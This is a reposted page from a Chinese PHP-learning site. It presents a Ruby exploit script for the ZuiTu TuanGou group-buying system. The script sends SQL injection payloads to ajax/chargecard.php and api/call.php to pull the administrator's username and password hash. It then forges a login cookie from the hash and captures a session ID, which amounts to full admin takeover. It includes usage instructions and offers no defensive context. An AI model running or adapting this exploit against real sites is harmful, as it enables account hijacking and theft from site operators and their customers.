网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

ZuiTu TuanGou System Inejction Exploit - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 这次获取hash用的不是盲注require net/httprequire urirequire #39;digest/md5#39;doc =HERE-------------------------------------------------------ZuiTu TuanGou System Inejction ExploitA......

这次获取hash用的不是盲注


 

require "net/http"
require "uri"
require 'digest/md5'

doc =<<HERE
-------------------------------------------------------
ZuiTu TuanGou System Inejction Exploit
Author:ztz www.2cto.com
Blog:http://ztz.fuzzexp.org/
-------------------------------------------------------

HERE

usage =<<HERE
Usage: 		ruby #{$0} host port path
example: 	ruby #{$0} demo.zuitu.com 80 /
HERE

def send(url, cookie='')

	uri = URI(url)

	http = Net::HTTP.new(uri.host, uri.port)

	request = Net::HTTP::Get.new(uri.request_uri)
	if cookie.length != 0
		request.initialize_http_header({"Cookie" => "#{$cookie}"})
	end

	response = http.request(request)

	return response.body

end

def encode64(bin)  
  [bin].pack("m")  
end

def getpassword

	exp1 = "http://#{$host}:#{$port}/#{$path}ajax/chargecard.php?action=query&secret=')%2F**%2Fand%2F**%2F1%3D2%2F**%2Funion%2F**%2Fselect%2F**%2F1%2C2%2Cconcat(username%2CCHAR(0x3d)%2Cpassword)%2C4%2C5%2C9999647600%2F**%2Ffrom%2F**%2Fuser%2F**%2Fwhere%2F**%2Fid%3D1;%23"
	exp2 = "http://#{$host}:#{$port}/#{$path}api/call.php?action=query&num=1')%2F**%2Fand%2F**%2F1%3D2%2F**%2Funion%2F**%2Fselect%2F**%2F1%2C2%2C3%2Cconcat(username%2CCHAR(0x3d)%2Cpassword)%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2F**%2Ffrom%2F**%2Fuser%2F**%2Fwhere%2F**%2Fid%3D1%3B%23"

	$password = send(exp1).scan(/\w{32}/)

	if $password.length == 0

		$password = send(exp2).scan(/\w{32}/)

	end

end

def getsession

	cname = Digest::MD5.hexdigest($host)[0, 4] + "_ru"
	cvalue = "1@" + $password.join()

	$cookie = cname + "=" + encode64(cvalue)

	puts "[*]cookie: #{$cookie}"

	uri = URI("http://#{$host}:#{$port}/#{$path}index.php")

	http = Net::HTTP.new(uri.host, uri.port)

	request = Net::HTTP::Get.new(uri.request_uri)
	request.initialize_http_header({"Cookie" => "#{$cookie}"})

	response = http.request(request)

	$session = response["Set-Cookie"].scan(/PHPSESSID=\w+;/).join()

end

puts doc
if ARGV.length < 3

	puts usage

else

	$host = ARGV[0]
	$port = ARGV[1]
	$path = ARGV[2]

	puts "[*]get administrator's hash..."

	getpassword()

	if $password.length == 0
		puts "[-]Can't get administrator's hash..."
		exit
	end

	puts "[+]hash: #{$password.join()}"

	puts "[*]Inject into cookie..."

	getsession()

	if $session.length == 0
		puts "[-]can't get cookie!"
	end

	puts "[+]set this cookie: #{$session}"

end

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论